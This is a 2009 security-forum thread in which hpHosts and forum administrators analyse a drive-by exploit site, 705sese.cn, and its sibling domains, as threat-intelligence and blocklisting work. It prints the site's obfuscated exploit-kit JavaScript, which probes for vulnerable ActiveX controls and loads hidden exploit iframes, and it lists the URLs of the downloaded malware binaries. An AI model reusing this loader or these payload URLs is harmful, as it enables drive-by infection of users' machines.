Author Topic: 705sese.cn (exploits and trojan)  (Read 2920 times)

0 Members and 1 Guest are viewing this topic.

January 15, 2009, 11:17:43 pm
Read 2920 times

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
This one was submitted to me via e-mail, and a quick look shows several exploits etc. One of the pages I checked;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://www.705sese.cn/a2/fxx.htm
Server IP: 59.34.197.15 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 15 January 2009
Time: 23:12:54:12
*****************************************************************

<Script>
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>");
document.write("");
document.write("<Iframe width=100 height=0 src=../a1/ss.htm></iframe>");
window.status="";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<Iframe width=100 height=0 src=../a1/Ms06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x65\x72\x2e\x44\x4c\x6f\x61\x64\x65\x72\x2e\x31");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxac";var qxaaxx="aaaac";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("Downloader.DLoader.1");
document.write("<Iframe width=100 height=0 src=../a1/no.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("MPS.StormPlayer");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/bfyy.htm></iframe>");}}var sdddd="x";var sdddd="x";
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{var dxl="x";if(f!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32"){var ammc="dsvb";
document.write('<iframe style=display:none src="../a1/real.htm"></iframe>');}
else
document.write('<iframe style=display:none src="../a1/real.html"></iframe>');
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";abc="dfdae";document.write("");var fkav="BS";var fkasaccv="BS";var fkaqfccv="BS";var fkaqjfccv="BS";var bccv="BS";
</script>
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

January 15, 2009, 11:51:19 pm
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
OMG, a lot of exploits.  >:(

Resulting binaries are

Code: [Select]
http://d.bc-s350.cn/down/gr.exe
http://d.oixka.com/new/a1.css

Wepawet analysis report
http://wepawet.cs.ucsb.edu/view.php?hash=1989583b93eb6896444a0710208e67b9&t=1232062951&type=js
Ruining the bad guy's day

January 18, 2009, 05:18:02 pm
Reply #2

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Same thing happens at

Code: [Select]
http://www.706sese.cn/a8/fxx.htm
And there a more domains like

707sese.cn
708sese.cn
709sese.cn
...
Ruining the bad guy's day

January 19, 2009, 02:47:42 am
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Seems to be 705-710 thus far :) (fails to resolve < 705 and from 711 onwards)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net